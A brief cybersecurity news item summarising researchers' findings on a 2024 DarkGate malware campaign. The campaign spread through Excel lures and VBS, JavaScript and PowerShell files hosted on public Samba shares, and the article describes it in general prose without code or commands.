DarkGate: Malware Campaign Targeting Samba File Shares Revealed.

The use of Samba file shares to initiate infections was revealed by cybersecurity researchers in a brief DarkGate malware campaign.

According to Unit 42 of Palo Alto Networks, the activity occurred between March and April in the year 2024. The infection chains employed servers that hosted Visual Basic Script (VBS) and JavaScript files through public-facing Samba file shares. Their targets were located across North America, Europe, as well as certain regions of Asia.

malware dissemination

According to Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan security researchers on the topic although brief in duration; the campaign serves as an insightful example of how nefarious agents can resourcefully misuse lawful tools and services for malware dissemination.

In 2018, DarkGate made its initial appearance and has since transformed into a malware-as-a-service (MaaS) product. A select few clients use it with high supervision. Its features include the ability to manipulate hijacked hosts remotely, execute code, mine cryptocurrency, initiate reverse shells and install supplementary payloads.

August 2023

The use of malware has notably increased in recent months, especially since the QakBot infrastructure was dismantled by multinational law enforcement agencies in August 2023.

Unit 42’s campaign begins with Microsoft Excel (.xlsx) files that prompt targets to click on an embedded Open button. This action fetches and runs VBS code from a Samba file share.

The PowerShell script is set up to fetch and run another PowerShell script that facilitates the download of a DarkGate package based on AutoHotKey.There is no distinction between alternative sequences utilizing JavaScript files instead of VBS, as both are designed to retrieve and execute the subsequent PowerShell script.To impede analysis, DarkGate scans for different anti-malware software and assesses CPU details to distinguish between physical or virtual environments.

Additionally, it scrutinizes the active processes on a host system to detect any reverse engineering tools, debuggers, or virtualization applications in use.

As per the researchers, HTTP requests of DarkGate C2 traffic are unencrypted while its data is obscured, and it seems as text encoded with Base64.

DarkGate’s evolving infiltration techniques and resistance to analysis serve as a strong reminder of the crucial requirement for robust and proactive cybersecurity defenses.